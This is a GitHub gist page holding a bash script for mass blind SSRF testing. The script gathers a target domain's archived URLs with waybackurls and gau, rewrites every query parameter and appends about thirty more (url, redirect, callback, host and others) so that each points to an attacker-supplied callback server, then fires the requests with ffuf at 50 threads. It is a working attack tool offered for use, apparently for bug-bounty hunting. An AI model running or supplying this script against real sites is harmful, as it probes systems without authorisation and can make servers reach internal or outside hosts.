-
-
Save testingweb624/43188e213801d25dc69d3ba3a976be3f to your computer and use it in GitHub Desktop.
Revisions
-
hussein98d created this gist
May 7, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,20 @@ echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" echo "Usage: bash script.sh domain.com http://server-callbak" echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" if [ -z "$1" ]; then echo >&2 "ERROR: Domain not set" exit 2 fi if [ -z "$2" ]; then echo >&2 "ERROR: Sever link not set" exit 2 fi echo "Getting WaybackURLS" waybackurls $1 > $1-ssrf.txt echo "Getting URLS with GAU" gau $1 >> $1-ssrf.txt echo "Putting them all together.." cat $1-ssrf.txt | sort | uniq | grep "?" | qsreplace -a | qsreplace $2 > $1-ssrf2.txt sed -i "s|$|\&dest=$2\&redirect=$2\&uri=$2\&path=$2\&continue=$2\&url=$2\&window=$2\&next=$2\&data=$2\&reference=$2\&site=$2\&html=$2\&val=$2\&validate=$2\&domain=$2\&callback=$2\&return=$2\&page=$2\&feed=$2\&host=$2&\port=$2\&to=$2\&out=$2\&view=$2\&dir=$2\&show=$2\&navigation=$2\&open=$2|g" $1-ssrf2.txt echo "Firing the requests - check your server for potential callbacks" ffuf -w $1-ssrf2.txt -u FUZZ -t 50